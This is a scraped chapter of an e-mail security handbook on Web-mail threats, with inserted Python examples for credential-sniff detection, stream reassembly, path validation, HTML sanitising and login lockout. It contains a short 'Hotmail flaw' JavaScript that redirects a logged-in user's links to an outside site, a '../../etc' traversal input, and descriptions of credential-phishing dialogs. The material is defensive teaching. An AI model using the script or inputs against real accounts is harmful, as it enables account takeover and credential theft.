E-mail Virus Protection Handbook, part 4 (potx)


128 Chapter 4 • Web-based Mail Issues

POST /config/login?5o0hflhv037e5 HTTP/1.1
Accept: image/gif, image/jpeg. image/pjeg, application/vnf.ms-powerpoint, */*
Referer: http://login.yahoo.com/config/mail?.intl=us&.lg=us
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible: MSIE 5.0; Windows 98; DigExt)
Host: login.yahoo.com
Content-Length: 102
Connection: Keep-Alive
….tries=&.src=ym&.last=&promo=&.intl=us&bypass=&.partner=&.chkP=Y&.done=&login=marfino&passwd=password

The last portion of this packet clearly states the user name and password mentioned earlier: login = marfino and password = password. Once a malicious user obtains this information, he or she can log into your Web e-mail server with impunity. Most hackers who have been able to do this simply read the e-mail messages rather than deleting them or conducting noticeable mischief, because most hackers are interested in gaining information over a long period of time; deleting a message would leave signs of tampering. It is likely that many e-mail accounts are actually compromised without their owners knowing it.

Case Study

Some America Online configurations are subject to sniffing attacks. A sniffer is a program that monitors and analyzes network traffic. It is designed to detect bottlenecks and problems on the network; using this information, a network manager can keep traffic flowing efficiently. Many commercial sniffing products are available, such as Network Associates' Sniffer Basic or the UNIX tool tcpdump. As you might remember, a sniffer can also be used to capture data being transmitted on a network, much like wiretapping a phone. A sniffing attack is when a sniffer is used to capture data in transit, such as passwords during login and e-mail messages once they are sent.
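What a sniffer sees in that POST is a form body with the account name and password in the clear. The following Python is an added example, not code from the book: it parses a captured HTTP request and flags credential fields that are readable on the wire, the check a defender runs over captured traffic to find logins that are not protected by TLS. The capture is constructed to resemble the Yahoo! POST above; the field-name patterns are an assumption, not a list from the book.

```python
import re
from urllib.parse import parse_qs

# Constructed capture modelled on the Yahoo! login POST above; the account
# name and password are placeholders, not real credentials.
CAPTURED_REQUEST = (
    "POST /config/login?5o0hflhv037e5 HTTP/1.1\r\n"
    "Host: login.yahoo.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 53\r\n"
    "\r\n"
    ".tries=&.src=ym&.chkP=Y&login=marfino&passwd=password"
)

# Assumed field-name patterns: names that usually carry a secret, and names
# that carry the account identifier.
SECRET_FIELDS = re.compile(r"pass|pwd|secret|token", re.IGNORECASE)
USER_FIELDS = re.compile(r"^(login|user|username|email|uid)$", re.IGNORECASE)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def find_cleartext_credentials(raw):
    """List the credential fields readable in a captured form POST.

    Secret values are never copied into the result; only their length is
    reported, so the finding can be logged without re-exposing the password.
    """
    method, _target, headers, body = parse_http_request(raw)
    if method != "POST":
        return []
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    findings = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if SECRET_FIELDS.search(field):
            findings.append({"field": field, "kind": "secret", "length": len(values[0])})
        elif USER_FIELDS.match(field):
            findings.append({"field": field, "kind": "username", "value": values[0]})
    return findings


if __name__ == "__main__":
    for finding in find_cleartext_credentials(CAPTURED_REQUEST):
        print(finding)
```

Run over the same login submitted through an HTTPS connection, the scan sees only ciphertext and reports nothing; that is the property the remainder of the chapter relies on when it recommends encrypted login.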
The following figures illustrate the use of Network Associates' Sniffer Basic to monitor an e-mail message being sent using America Online (see Figure 4.6). The e-mail is created in America Online version 5.0; the workstation is connected to the Internet over a cable modem. Once the user clicks the Send Now button, about 11 packets are sent. Sniffer Basic is running on the user's workstation, capturing all incoming and outgoing traffic. Figure 4.7 shows the first packet.

The first packet contains the first 34 characters of the body of the e-mail. The second packet (see Figure 4.8) contains the rest of the body of the message: "Make sure no one else sees this!" The last packet (see Figure 4.9) contains both the subject and the recipient, marfino@yahoo.com, and shows that this is an e-mail sent from AOL.

Figure 4.6 The original message to be sniffed.
Figure 4.7 The first packet being sniffed.

Not only is this data visible when monitoring the user's workstation, it can also be captured on every router on the way to the destination.

Figure 4.8 The second packet being sniffed.
Figure 4.9 The last packet being sniffed.

Specific Sniffer Applications

Applications such as SessionWall (www.sessionwall.com), Ethereal (www.ethereal.com) and spynet (packetstorm.securify.com) can sniff packets and then reassemble the entire TCP session. As a result, such a tool can sniff the individual packets in a connection and then provide an identical copy of the e-mail message. If a malicious user is able to position himself between you and the destination computer, he will be able to read your e-mail.
For example, Figure 4.10 shows a packet capture from Ethereal, which is usually run on Linux and UNIX systems. Figure 4.10 shows that someone has captured a series of TCP transmissions: an e-mail message is being sent from port 25 of the machine with the IP address 10.100.100.50 to port 1035 of the machine with the IP address 10.100.100.60. Port 25, as you may remember, is the standard SMTP port, which does nothing but send messages. In this case, Sendmail has sent a message to machine 10.100.100.60. If a malicious user wished to, he could sift through each of these individual packets and obtain information from them. However, Figure 4.11 shows a rather convenient feature provided by Ethereal: by selecting the Follow TCP Stream option, any user can see a completely reassembled series of packets. As you can see, Ethereal reconstitutes the entire SMTP session. The same technique applies to POP3 sessions as well; Figure 4.12 shows how it is possible to reconstitute an entire POP3 session.

Figure 4.10 An SMTP session captured in Ethereal.

Although the password in this session has been encrypted, the encryption scheme is very weak and can be subjected to a dictionary attack. You can learn more about Ethereal at www.ethereal.com.

NOTE

Applications such as Ethereal are not inherently illicit. They are tools, just like any other software application. In fact, Ethereal is fast becoming a standard packet sniffer for systems administrators who use Linux systems to monitor networks and serve up Web pages.

Figure 4.11 The results of the Follow TCP Stream option in Ethereal.
Figure 4.12 Sniffing an unencrypted Web-based POP3 session.
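Follow TCP Stream works because TCP sequence numbers let the individual segments be put back in order regardless of how they were captured. The Python below is an added example, not code from the book or from Ethereal: it reassembles one direction of a captured stream from its segments, discarding retransmissions and refusing to paper over a gap, and then reads the SMTP envelope out of the client side the way an analyst would after reconstituting the session. The capture is constructed (the addresses follow Figure 4.10, the hostnames and sender are invented).

```python
from dataclasses import dataclass


@dataclass
class Segment:
    """One captured TCP segment, reduced to the fields reassembly needs."""
    src: str        # "address:port" of the sender
    dst: str
    seq: int        # sequence number of the first payload byte
    payload: bytes


# Constructed capture (not from the book's figures): the client at
# 10.100.100.60:1035 submits a message to the SMTP server at 10.100.100.50:25.
# One segment arrives early and one is retransmitted, as happens on real links.
SERVER = "10.100.100.50:25"
CLIENT = "10.100.100.60:1035"
CAPTURE = [
    Segment(SERVER, CLIENT, 1000, b"220 mail.example.test ESMTP\r\n"),
    Segment(CLIENT, SERVER, 5000, b"HELO client.example.test\r\n"),
    Segment(SERVER, CLIENT, 1029, b"250 Hello\r\n"),
    Segment(CLIENT, SERVER, 5057, b"RCPT TO:<marfino@yahoo.com>\r\n"),    # arrives early
    Segment(CLIENT, SERVER, 5026, b"MAIL FROM:<user@example.test>\r\n"),
    Segment(CLIENT, SERVER, 5026, b"MAIL FROM:<user@example.test>\r\n"),  # retransmission
    Segment(CLIENT, SERVER, 5086, b"DATA\r\n"),
]


def reassemble(segments, src, dst):
    """Return the byte stream sent from src to dst, ordered by sequence number.

    Duplicate or overlapping segments are trimmed; a gap raises ValueError so a
    missing segment is never silently skipped over.
    """
    flow = sorted((s for s in segments if s.src == src and s.dst == dst),
                  key=lambda s: s.seq)
    if not flow:
        return b""
    data = bytearray()
    expected = flow[0].seq
    for seg in flow:
        if seg.seq > expected:
            raise ValueError("gap in stream at seq %d" % expected)
        overlap = expected - seg.seq          # bytes we already have
        fresh = seg.payload[overlap:]
        data += fresh
        expected += len(fresh)
    return bytes(data)


def smtp_envelope(client_stream):
    """Extract sender and recipients from the client side of an SMTP session."""
    sender, recipients = None, []
    for line in client_stream.decode("ascii", "replace").split("\r\n"):
        upper = line.upper()
        if upper.startswith("MAIL FROM:"):
            sender = line[10:].strip().strip("<>")
        elif upper.startswith("RCPT TO:"):
            recipients.append(line[8:].strip().strip("<>"))
        elif upper == "DATA":
            break                              # what follows is the message body
    return sender, recipients


if __name__ == "__main__":
    client_side = reassemble(CAPTURE, CLIENT, SERVER)
    print(client_side.decode())
    print(smtp_envelope(client_side))
```

The same routine applied to a POP3 capture yields the USER and PASS lines in order, which is exactly why the chapter's advice is to keep such sessions off unencrypted links rather than to hope an attacker cannot reorder packets.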
Code-based Attacks

Thus far, you have learned about denial of service and sniffing attacks, neither of which is unique to Web-based e-mail servers. Perhaps the most distinctive threat to Web-based e-mail servers comes from their reliance on Common Gateway Interface (CGI) scripts to provide e-mail services. A CGI script is really nothing more than a mini application that executes on the server. When, for example, you create an account on Netscape's Webmail server, chances are that this one activity actually involves several powerful CGI scripts that accomplish at least the following tasks:

1. Adding contact information to a database, so that the information can be sold to a third party or so that the company can use it to authenticate a user who has lost his password and wishes to recover it.
2. Creating an account in the system's POP3 user database.
3. Creating a small directory that will act as the inbox for the user.
4. Sending an e-mail message to the inbox, welcoming the new user.

It is possible that many additional functions and scripts are necessary simply to create the account. Now consider how many other CGI scripts are necessary to enable login, changing of passwords, and so forth. A CGI script can be written in almost any language. Common CGI languages include:

■ Perl
■ Active Server Pages, using VBScript
■ JavaScript
■ Java
■ PHP: Hypertext Preprocessor

Regardless of which is used, it is often very difficult to create powerful server-side scripts that do their job yet do not open up security problems. Because CGI scripts are mini applications that execute on the server without anyone watching them, it is possible to redirect this execution and open up a security hole.
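Step 3 of the account-creation sequence above (creating the inbox directory) shows how a CGI script ends up trusting its input. The Python below is an added example, not code from the book or from any Webmail product: the first function computes the inbox path the way a careless script would, straight from the submitted form field; the second applies an allowlist and then confirms the resolved path still sits under the mail root. The mail root and the account-name rule are assumptions chosen for the example.

```python
import os
import re
from urllib.parse import parse_qs

# Assumed layout for the example; the book does not describe a real server's.
MAILROOT = "/var/spool/webmail"
# Allowlist: lower-case letter first, then 2..31 letters, digits or underscores.
ACCOUNT_NAME = re.compile(r"^[a-z][a-z0-9_]{2,31}$")


def inbox_path_unsafe(form_body):
    """What a careless CGI script does: build the path from the raw form value."""
    username = parse_qs(form_body).get("login", [""])[0]
    return os.path.join(MAILROOT, username)   # "../../etc" walks out of MAILROOT


def inbox_path_safe(form_body):
    """Validate the account name, then prove the resolved path stays in MAILROOT."""
    username = parse_qs(form_body).get("login", [""])[0]
    if not ACCOUNT_NAME.match(username):
        raise ValueError("account name rejected")
    root = os.path.realpath(MAILROOT)
    path = os.path.realpath(os.path.join(root, username))
    # Belt and braces: even if the allowlist were loosened later, a path whose
    # parent is not the mail root is refused rather than created.
    if os.path.dirname(path) != root:
        raise ValueError("account path escapes mail root")
    return path


if __name__ == "__main__":
    # Constructed form submissions, URL-encoded as a browser would send them.
    for body in ("login=marfino", "login=..%2F..%2Fetc", "login=Marfino"):
        print(body, "->", inbox_path_unsafe(body))
        try:
            print("   accepted:", inbox_path_safe(body))
        except ValueError as err:
            print("   rejected:", err)
```

The allowlist does the real work; the realpath check is there so that a later "small" change to the rule (allowing dots, say) cannot quietly turn into a traversal. Note that the script validates the value it received, not the HTML form that produced it, because nothing stops a user from submitting a different form.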
The PHF Bug

Several years ago, the Solaris operating system, which is a flavor of UNIX, used a sample script named PHF. This script was placed into the CGI-BIN, a special directory that allows the execution of CGI scripts. The problem with the PHF code was that it made it very easy for a malicious user to obtain the password file for the server. It was so easy, in fact, that if the PHF application was installed, the user name and password information would appear in the user's browser. All the user had to do was copy the information and then run a cracking program against it.

The PHF bug is no longer a real threat, because most hackers and systems administrators already know about it. However, in 1996 it was all the rage, and as late as 1998 the United States White House e-mail server was attacked by a user who exploited this bug. Due to the rather complex nature of CGI, many additional CGI scripts exist that can open similar security holes. In fact, most hacker sites are full of specialized applications called CGI scanners, which are specially designed to find and exploit problem CGI scripts.

Another reason why CGI scripts can cause problems is that they are often vulnerable to buffer overflows. As you might remember from Chapter 1, a buffer overflow occurs when information is not checked when it is passed between variables in an application. If the information passed between variables is too large for the receiving variable, the application that contains these problem variables can crash. Many rather interesting things can happen during a buffer overflow, not the least of which is that the system can simply open itself up to any user to take over full administrative access to the system. This is precisely what happened with the CMail 2.3 Web e-mail server.
It contains a buffer overflow that can lead to a denial of service attack or to compromise of the system. You can download a newer version of CMail at many sites, including http://chicago.supersharewareman.com/Apps/779.asp.

Avoiding Buffer Overflows

The problem with buffer overflows is that the only way you can solve them is by upgrading to the latest stable version of the software application. Do not make the mistake of thinking that the latest version is always the most stable. This is often not the case; many times, the latest version actually introduces instabilities that a malicious user can exploit. Unless you create your own software, you are pretty much forced into trusting the people who write the software you use. The best way to guard against these problems is to keep current about the software. You can:

■ Regularly visit the Web site of the company that makes the software you are using for the latest advisories and updates.
■ Visit the www.cert.org Web site and search for advisories concerning your software.
■ Visit well-known software sites, such as www.freshmeat.com, as well as hacker sites, such as www.securityfocus.com and www.ntbugtraq.com.

Hostile Code

Because Web-based e-mail accounts must be accessed by a Web browser, most hackers immediately target the most current browsers in use. As of this writing, these are Internet Explorer 5 and Netscape 6. When IE 4.0 and Netscape 3.0 were popular, many malicious users discovered that anyone who used the e-mail clients that came with these browsers to receive their e-mail was vulnerable to embedded code in the e-mail messages they read. The following code, written in JavaScript, allowed a malicious user to log in to anyone's account:

Hotmail flaw.
(second version)

    // Runs inside the logged-in user's Hotmail frameset when the HTML message is viewed.
    errurl = "http://www.because-we-can.com/hotmail/default.htm";
    // Point the links of the menu frame (all but the last) at the external page,
    // and make them open in the "work" frame.
    nomenulinks = top.submenu.document.links.length;
    for (i = 0; i < nomenulinks - 1; i++) {
        top.submenu.document.links[i].target = "work";
        top.submenu.document.links[i].href = errurl;
    }
    // Do the same for the links of the work frame.
    noworklinks = top.work.document.links.length;
    for (i = 0; i < noworklinks - 1; i++) {
        top.work.document.links[i].target = "work";
        top.work.document.links[i].href = errurl;
    }

Taking Advantage of System Trusts

Many additional attacks exist, most of which are not documented, mainly because most hackers wish to keep their little tricks as secret as possible. Another reason why Web-based e-mail servers such as Hotmail are vulnerable to attacks is that the servers are always willing to trust any input generated by the browser of a user who has logged in. As long as a user is logged in, the server's CGI scripts tend to assume that all input is benign, if not helpful. This is not always the case. A malicious user can send an HTML-enabled message that contains embedded code that can:

■ Change the legitimate user's password to one known by the malicious user. The malicious user can then log in to read and send mail under the legitimate user's name.
■ Present a fake dialog box meant to trick an unwitting user into entering his login information, which is then immediately e-mailed to the malicious user.

Most of these techniques work only if the user is currently logged in. Still, this is almost always the case when a user is checking e-mail. Even though such threats are almost immediately corrected as soon as they are made public, using such services to store sensitive information and passwords can place you and your associates at risk.

Solving the Problem of System Trusts

One of the best ways to solve this problem is to disable HTML-based e-mail and active scripting, as it is called in Windows Explorer, on your e-mail client.
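Disabling active scripting on the client is the end user's remedy; the server-side counterpart is to strip active content from an HTML message before it is rendered in the logged-in user's browser, so that script such as the Hotmail snippet above never executes in the session. The Python below is an added example, not code from the book or from any Webmail service: a small HTML filter built on the standard-library parser that removes script-bearing elements, on* event attributes and javascript: URLs, and keeps an audit list of what it removed. The tag and attribute sets are the example's own choices, and the sample message is constructed.

```python
from html import escape
from html.parser import HTMLParser

# Elements that can run code or pull in outside content; removed with their bodies.
BLOCKED_TAGS = {"script", "iframe", "object", "embed", "applet", "frame",
                "frameset", "form", "style", "meta", "link"}
# Elements that have no closing tag, so removing them does not open a skip region.
VOID_TAGS = {"br", "img", "hr", "meta", "link"}
URL_ATTRS = {"href", "src", "action"}


class ActiveContentStripper(HTMLParser):
    """Rebuilds the markup without anything that could execute or redirect."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.skip_depth = 0     # > 0 while inside a blocked element
        self.removed = []       # audit trail, e.g. "script", "onclick@a"

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.removed.append(tag)
            if tag not in VOID_TAGS:
                self.skip_depth += 1
            return
        if self.skip_depth:
            return
        parts = [tag]
        for name, value in attrs:
            if name.startswith("on"):                       # onclick, onerror, ...
                self.removed.append("%s@%s" % (name, tag))
                continue
            if name in URL_ATTRS and value and value.strip().lower().startswith("javascript:"):
                self.removed.append("%s@%s" % (name, tag))
                continue
            parts.append(name if value is None else '%s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)                    # <br/> -> <br>

    def handle_endtag(self, tag):
        if tag in BLOCKED_TAGS and tag not in VOID_TAGS:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if not self.skip_depth:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))      # text is re-escaped on output


def strip_active_content(html_text):
    """Return (sanitized_html, list_of_removed_items)."""
    parser = ActiveContentStripper()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed HTML message carrying the kinds of embedded code the text describes.
SAMPLE_MESSAGE = (
    "<p>Hello,</p>"
    "<script>/* would run with the reader's logged-in session */</script>"
    '<a href="javascript:void(0)" onclick="steal()">click</a>'
    '<img src="cid:logo" onerror="alert(1)">'
    '<a href="http://example.test/">ok</a>'
)

if __name__ == "__main__":
    clean, removed = strip_active_content(SAMPLE_MESSAGE)
    print(clean)
    print("removed:", removed)
```

A filter of this shape is an allow-by-construction design: everything it emits was rebuilt from parsed tokens, so malformed markup that a browser might repair into a script tag is not passed through unchanged. Comments are dropped by the base parser's default handler, which also closes the conditional-comment trick older Internet Explorer versions honoured.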
Cracking the Account with a "Brute Force" or Dictionary Application

A hacker is not limited to sending malicious code. Many applications exist that repeatedly try to log in to a server using as many user name and password combinations as possible. This practice is often called a brute force attack, because it is a rather unsophisticated attempt to find a password. A slightly more sophisticated attack involves the use of a simple text file that contains thousands and thousands of words and names that you might find in a dictionary; these words can be in various languages. Password-cracking applications such as Munga Bunga are especially popular among hackers who attack Hotmail and Yahoo!. Munga Bunga will not crack a user's password every time; worthwhile hacking is never that easy. However, most people pick passwords that would be found in a password-cracking program's dictionary file, and this form of attack is often successful.

Solving Cracking Attacks in Web-based E-mail Servers

The chief solution would be to invoke controls on the server that lock out an account when it is being bombarded with failed requests. Unfortunately, this is not possible with large, public Web e-mail servers such as Yahoo! and Netscape; users want the convenience of being able to log in, and applying such security measures will likely drive people away. Additionally, invoking such security measures can consume a great deal of time. Because most of these services are free, it is highly unlikely that many companies will be diligent about protecting their services in this way.

As an end user, the best way to thwart such attacks is to change your password often and ensure that it is not one that could be found in a dictionary. Whenever possible, use non-standard characters such as those shown in Table 4.1.

Table 4.1 Non-standard Characters To Use in E-mail Passwords

~ ! ` @ % ^ $ ( ) ? > <

You should then make the password as long as possible (at least six letters). Then, use a combination of lower- and uppercase letters. In spite of all this, try to make the password fairly easy to remember. One way to do this is to take a recognizable word and substitute several characters in order to make it memorable only to you. You can substitute numbers and non-standard characters for letters. For example, the word popcorn can become )O-c($n. In this example, the letter p is substituted with ), because it is the nearest special character to the "p" key. The capital letter "O" is fairly self-explanatory. The - character is a substitution for "p," because it, too, is close to the letter p. Finally, the $ sign is near the "r" on the keyboard, and "n" is left as is. You will, of course, have to come up with a system that suits you.

Finally, make sure that you change your passwords often. This way, even if someone obtains your password, they will have access only for so long (assuming that they aren't simply able to sniff your password).

Physical Attacks

Never assume that a malicious user is always someone who lives far away from you. It is possible that a malicious user has physical access to your system. If this is the case, a hacker can use a keylogger program. A keylogger program allows a user to track users' keystrokes on their system. The application silently listens in the background and records all keystrokes to a plaintext file, or to a remote system where the malicious user is watching. Anything you type can be read. In order to implement a keylogger, a malicious user must have access to the target user's system. This may not be as difficult as it seems: How many people really take the time to implement screensaver passwords, or [...]
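The two controls the text describes, a server-side lockout against bombardment and a password that is long, mixed-case, uses Table 4.1 characters and is not a dictionary word, fit in one small piece of Python. This is an added example, not code from the book: a lockout tracker with a sliding window of failures, and a checker that reports how a candidate password falls short of the chapter's advice. The thresholds and the tiny stand-in dictionary are assumptions made for the example; the checker passes the book's own )O-c($n and rejects popcorn even with a capital letter and a digit added.

```python
import time
from collections import defaultdict, deque

# Lockout policy: assumed values for the example, not figures from the book.
LOCKOUT_THRESHOLD = 5     # this many failures ...
LOCKOUT_WINDOW = 300      # ... within this many seconds ...
LOCKOUT_DURATION = 900    # ... lock the account for this long


class LoginGuard:
    """Tracks failed logins per account and locks the account when bombarded."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                   # injectable so the policy can be tested
        self.failures = defaultdict(deque)   # account -> timestamps of recent failures
        self.locked_until = {}

    def is_locked(self, account):
        until = self.locked_until.get(account)
        return until is not None and self.clock() < until

    def record_failure(self, account):
        """Register a failed attempt; return True if this one triggered a lockout."""
        now = self.clock()
        recent = self.failures[account]
        recent.append(now)
        while recent and now - recent[0] > LOCKOUT_WINDOW:
            recent.popleft()                 # forget failures outside the window
        if len(recent) >= LOCKOUT_THRESHOLD:
            self.locked_until[account] = now + LOCKOUT_DURATION
            recent.clear()
            return True
        return False

    def record_success(self, account):
        self.failures.pop(account, None)


# The Table 4.1 characters, and a tiny stand-in for a cracker's dictionary file.
TABLE_4_1 = set("~!`@%^$()?><")
SMALL_DICTIONARY = {"password", "popcorn", "letmein", "yahoo", "hotmail"}


def password_problems(password):
    """Return the ways a password falls short of the chapter's advice ([] means ok)."""
    problems = []
    if len(password) < 6:
        problems.append("shorter than six characters")
    if not (any(c.islower() for c in password) and any(c.isupper() for c in password)):
        problems.append("no mix of upper- and lowercase letters")
    if not any(c in TABLE_4_1 for c in password):
        problems.append("no non-standard character from Table 4.1")
    # A cracker's wordlist is matched case-insensitively, and padding a word
    # with digits or symbols does not hide it, so strip those before looking it up.
    letters_only = "".join(c for c in password if c.isalpha()).lower()
    if password.lower() in SMALL_DICTIONARY or letters_only in SMALL_DICTIONARY:
        problems.append("found in the dictionary")
    return problems


if __name__ == "__main__":
    for candidate in (")O-c($n", "password", "Popcorn1"):
        print(repr(candidate), password_problems(candidate) or "ok")
```

The guard counts failures per account rather than per source address, because a dictionary tool can spread its attempts over many connections; a real deployment would also count per address to catch the reverse case, one source walking through many accounts.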

Posted: 14/08/2014, 04:21
